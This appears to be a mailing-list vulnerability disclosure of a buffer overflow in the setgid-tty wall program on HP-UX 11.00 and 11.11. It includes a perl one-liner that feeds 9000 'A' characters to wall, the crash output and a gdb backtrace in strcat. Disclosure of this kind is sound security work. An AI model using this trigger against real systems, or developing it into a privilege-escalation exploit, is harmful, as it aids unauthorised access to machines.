Hi all, after looking to check if this had been reported before I couldn't find anything, so here's my two cents:
HPUX /usr/sbin/wall Buffer Overflow.
bash-2.04$ ls -las /usr/sbin/wall
40 -r-xr-sr-x 1 bin tty 20480 Nov 7 1997 /usr/sbin/wall
Wall on HPUX works in the following way:
echo "Something to Say" > file wall file
The problem arises when we place 9000 A's into the file to be broadcast by the wall program.
(Tested on HPUX 11.11)
perl -e 'print "A" x 9000' > /tmp/out /usr/sbin/wall /tmp/out Memory fault
(Tested on HPUX 11.00) perl -e 'print "A" x 9000' > /tmp/out /usr/sbin/wall /tmp/out bash-2.04$ /usr/sbin/wall /tmp/out Segmentation fault
Looking at the registers, we can see:
Program received signal SIGSEGV, Segmentation fault. 0x7f779c08 in strcat () from /usr/lib/libc.2 (gdb) bt 7f779c08 in strcat () from /usr/lib/libc.2
Error accessing memory address 0xffffffff: Bad address. etc.. etc
The wall binary has Set Group ID of tty, so not a huge problem, but even so - still a security risk.
uk2sec Memebers; eip, c0w firstname.lastname@example.org